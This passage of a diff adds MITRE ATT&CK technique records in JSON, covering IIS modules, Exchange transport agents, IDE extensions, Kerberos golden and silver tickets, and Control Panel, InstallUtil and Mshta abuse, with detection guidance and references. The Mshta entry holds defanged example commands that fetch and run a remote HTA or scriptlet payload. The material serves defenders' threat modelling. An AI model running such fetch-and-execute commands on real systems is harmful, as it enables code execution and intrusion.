"https://docs.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview" + }, + { + "source_name": "ESET IIS Malware 2021", + "description": "Hromcov\u00e1, Z., Cherepanov, A. (2021). Anatomy of Native IIS Malware. Retrieved September 9, 2021.", + "url": "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf" + }, + { + "source_name": "Unit 42 RGDoor Jan 2018", + "description": "Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Wes Hurd" + ], + "x_mitre_data_sources": [ + "File: File Creation", + "Command: Command Execution", + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for creation and/or modification of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules. Changes to %windir%\\system32\\inetsrv\\config\\applicationhost.config could indicate an IIS module installation.(Citation: Microsoft IIS Modules Overview 2007)(Citation: ESET IIS Malware 2021)\n\nMonitor execution and command-line arguments of AppCmd.exe, which may be abused to install malicious IIS modules.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:43.995000+00:00\", \"old_value\": \"2025-04-15 19:58:59.560000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1038: Execution Prevention", + "M1045: Code Signing", + "M1047: Audit" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0017: Command (Command Execution)", + "DS0022: File (File Creation)", + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-12-12 15:08:20.972000+00:00", + "modified": "2025-04-25 14:46:19.364000+00:00", + "name": "Transport Agent", + "description": "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. \n\nAdversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1505/002", + "external_id": "T1505.002" + }, + { + "source_name": "Microsoft TransportAgent Jun 2016", + "description": "Microsoft. (2016, June 1). Transport agents. Retrieved June 24, 2019.", + "url": "https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help" + }, + { + "source_name": "ESET LightNeuron May 2019", + "description": "Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "ESET", + "Christoffer Str\u00f6mblad" + ], + "x_mitre_data_sources": [ + "File: File Creation", + "Application Log: Application Log Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:19.364000+00:00\", \"old_value\": \"2025-04-15 19:58:21.139000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1045: Code Signing", + "M1047: Audit" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0015: Application Log (Application Log Content)", + "DS0022: File (File Creation)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--66b34be7-6915-4b83-8d5a-b0f0592b5e41", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2025-03-30 22:16:24.078000+00:00", + "modified": "2025-04-23 12:40:46.664000+00:00", + "name": "IDE Extensions", + "description": "Adversaries may abuse an integrated development environment (IDE) extension to establish persistent access to victim systems.(Citation: Mnemonic misuse visual studio) IDEs such as Visual Studio Code, IntelliJ IDEA, and Eclipse support extensions - software components that add features like code linting, auto-completion, task automation, or integration with tools like Git and Docker. A malicious extension can be installed through an extension marketplace (i.e., [Compromise Software Dependencies and Development Tools](https://attack.mitre.org/techniques/T1195/001)) or side-loaded directly into the IDE.(Citation: Abramovsky VSCode Security)(Citation: Lakshmanan Visual Studio Marketplace) \n\nIn addition to installing malicious extensions, adversaries may also leverage benign ones. For example, adversaries may establish persistent SSH tunnels via the use of the VSCode Remote SSH extension (i.e., [IDE Tunneling](https://attack.mitre.org/techniques/T1219/001)). \n\nTrust is typically established through the installation process; once installed, the malicious extension is run every time that the IDE is launched. The extension can then be used to execute arbitrary code, establish a backdoor, mine cryptocurrency, or exfiltrate data.(Citation: ExtensionTotal VSCode Extensions 2025)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1176/002", + "external_id": "T1176.002" + }, + { + "source_name": "Abramovsky VSCode Security", + "description": "Abramovsky, O. (2023, May 16). VSCode Security: Malicious Extensions Detected- More Than 45,000 Downloads- PII Exposed, and Backdoors Enabled. Retrieved March 30, 2025.", + "url": "https://blog.checkpoint.com/securing-the-cloud/malicious-vscode-extensions-with-more-than-45k-downloads-steal-pii-and-enable-backdoors/" + }, + { + "source_name": "Lakshmanan Visual Studio Marketplace", + "description": "Lakshmanan, R. (2023, January 9). Hackers Can Abuse Visual Studio Marketplace to Target Developers with Malicious Extensions. Retrieved March 30, 2025.", + "url": "https://thehackernews.com/2023/01/hackers-distributing-malicious-visual.html" + }, + { + "source_name": "Mnemonic misuse visual studio", + "description": "Mnemonic. (n.d.). Advisory: Misuse of Visual Studio Code for traffic tunnelling. Retrieved March 30, 2025.", + "url": "https://www.mnemonic.io/resources/blog/misuse-of-visual-studio-code-for-traffic-tunnelling/" + }, + { + "source_name": "ExtensionTotal VSCode Extensions 2025", + "description": "Yuval Ronen. (2025, April 4). Mining in Plain Sight: The VS Code Extension Cryptojacking Campaign. Retrieved April 8, 2025.", + "url": "https://blog.extensiontotal.com/mining-in-plain-sight-the-vs-code-extension-cryptojacking-campaign-19ca12904b59" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Raghvendra Mishra, Arista Networks", + "Kevin Ward", + "Fabian Kammel" + ], + "x_mitre_data_sources": [ + "Process: Process Creation", + "Network Traffic: Network Traffic Flow" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-23 12:40:46.664000+00:00\", \"old_value\": \"2025-04-15 19:58:37.231000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Raghvendra Mishra, Arista Networks\", \"old_value\": \"Raghvendra Mishra\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M1017: User Training", + "M1033: Limit Software Installation", + "M1038: Execution Prevention", + "M1047: Audit", + "M1051: Update Software" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--768dce68-8d0d-477a-b01d-0eea98b963a1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-02-11 19:13:33.643000+00:00", + "modified": "2025-04-25 14:47:07.443000+00:00", + "name": "Golden Ticket", + "description": "Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) \n\nUsing a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)\n\nThe KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1558/001", + "external_id": "T1558.001" + }, + { + "source_name": "AdSecurity Kerberos GT Aug 2015", + "description": "Metcalf, S. (2015, August 7). Kerberos Golden Tickets are Now More Golden. Retrieved December 1, 2017.", + "url": "https://adsecurity.org/?p=1640" + }, + { + "source_name": "CERT-EU Golden Ticket Protection", + "description": "Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.", + "url": "https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf" + }, + { + "source_name": "ADSecurity Detecting Forged Tickets", + "description": "Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.", + "url": "https://adsecurity.org/?p=1515" + }, + { + "source_name": "ADSecurity Kerberos and KRBTGT", + "description": "Sean Metcalf. (2014, November 10). Kerberos & KRBTGT: Active Directory\u2019s Domain Kerberos Service Account. Retrieved January 30, 2020.", + "url": "https://adsecurity.org/?p=483" + }, + { + "source_name": "Stealthbits Detect PtT 2019", + "description": "Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.", + "url": "https://blog.stealthbits.com/detect-pass-the-ticket-attacks" + }, + { + "source_name": "Microsoft Kerberos Golden Ticket", + "description": "Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.", + "url": "https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Itamar Mizrahi, Cymptom" + ], + "x_mitre_data_sources": [ + "Active Directory: Active Directory Credential Request", + "Logon Session: Logon Session Metadata" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:07.443000+00:00\", \"old_value\": \"2025-04-15 19:58:42.362000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1015: Active Directory Configuration", + "M1026: Privileged Account Management" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0026: Active Directory (Active Directory Credential Request)", + "DS0028: Logon Session (Logon Session Metadata)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--d273434a-448e-4598-8e14-607f4a0d5e27", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-02-11 19:14:48.309000+00:00", + "modified": "2025-04-25 14:48:09.547000+00:00", + "name": "Silver Ticket", + "description": "Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)\n\nSilver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)\n\nPassword hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1558/002", + "external_id": "T1558.002" + }, + { + "source_name": "ADSecurity Silver Tickets", + "description": "Sean Metcalf. (2015, November 17). How Attackers Use Kerberos Silver Tickets to Exploit Systems. Retrieved February 27, 2020.", + "url": "https://adsecurity.org/?p=2011" + }, + { + "source_name": "ADSecurity Detecting Forged Tickets", + "description": "Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.", + "url": "https://adsecurity.org/?p=1515" + }, + { + "source_name": "Medium Detecting Attempts to Steal Passwords from Memory", + "description": "French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.", + "url": "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Metadata" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) \n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:09.547000+00:00\", \"old_value\": \"2025-04-15 19:59:10.698000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1027: Password Policies", + "M1041: Encrypt Sensitive Information" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0028: Logon Session (Logon Session Metadata)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-23 19:59:52.630000+00:00", + "modified": "2025-04-25 14:46:37.731000+00:00", + "name": "Control Panel", + "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\n\nControl Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)\n\nMalicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.\n\nAdversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/002", + "external_id": "T1218.002" + }, + { + "source_name": "Microsoft Implementing CPL", + "description": "M. (n.d.). Implementing Control Panel Items. Retrieved January 18, 2018.", + "url": "https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx" + }, + { + "source_name": "TrendMicro CPL Malware Jan 2014", + "description": "Merc\u00eas, F. (2014, January 27). CPL Malware - Malicious Control Panel Items. Retrieved January 18, 2018.", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" + }, + { + "source_name": "TrendMicro CPL Malware Dec 2013", + "description": "Bernardino, J. (2013, December 17). Control Panel Files Used As Malicious Attachments. Retrieved January 18, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/" + }, + { + "source_name": "Palo Alto Reaver Nov 2017", + "description": "Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" + }, + { + "source_name": "ESET InvisiMole June 2020", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "ESET" + ], + "x_mitre_data_sources": [ + "File: File Creation", + "Module: Module Load", + "Windows Registry: Windows Registry Key Modification", + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)\n\nInventory Control Panel items to locate unregistered and potentially malicious files present on systems:\n\n* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace and HKEY_CLASSES_ROOT\\CLSID\\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)\n* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the CPLs and Extended Properties Registry keys of HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec(\"c:\\windows\\system32\\control.exe {Canonical_Name}\", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}).(Citation: Microsoft Implementing CPL)\n* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Controls Folder\\{name}\\Shellex\\PropertySheetHandlers where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)\n\nAnalyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:37.731000+00:00\", \"old_value\": \"2025-04-15 19:58:29.962000+00:00\"}}}", + "previous_version": "2.1", + "changelog_mitigations": { + "shared": [ + "M1022: Restrict File and Directory Permissions", + "M1038: Execution Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Creation)", + "DS0011: Module (Module Load)", + "DS0017: Command (Command Execution)", + "DS0022: File (File Creation)", + "DS0024: Windows Registry (Windows Registry Key Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-23 19:09:48.811000+00:00", + "modified": "2025-04-25 14:46:11.581000+00:00", + "name": "InstallUtil", + "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe.\n\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/004", + "external_id": "T1218.004" + }, + { + "source_name": "MSDN InstallUtil", + "description": "Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/50614e95.aspx" + }, + { + "source_name": "LOLBAS Installutil", + "description": "LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Installutil/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Travis Smith, Tripwire", + "Casey Smith" + ], + "x_mitre_data_sources": [ + "Process: Process Creation", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:11.581000+00:00\", \"old_value\": \"2025-04-15 19:58:17.302000+00:00\"}}}", + "previous_version": "2.1", + "changelog_mitigations": { + "shared": [ + "M1038: Execution Prevention", + "M1042: Disable or Remove Feature or Program" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-23 19:32:49.557000+00:00", + "modified": "2025-04-25 14:47:18.707000+00:00", + "name": "Mshta", + "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/005", + "external_id": "T1218.005" + }, + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + }, + { + "source_name": "Red Canary HTA Abuse Part Deux", + "description": "McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.", + "url": "https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/" + }, + { 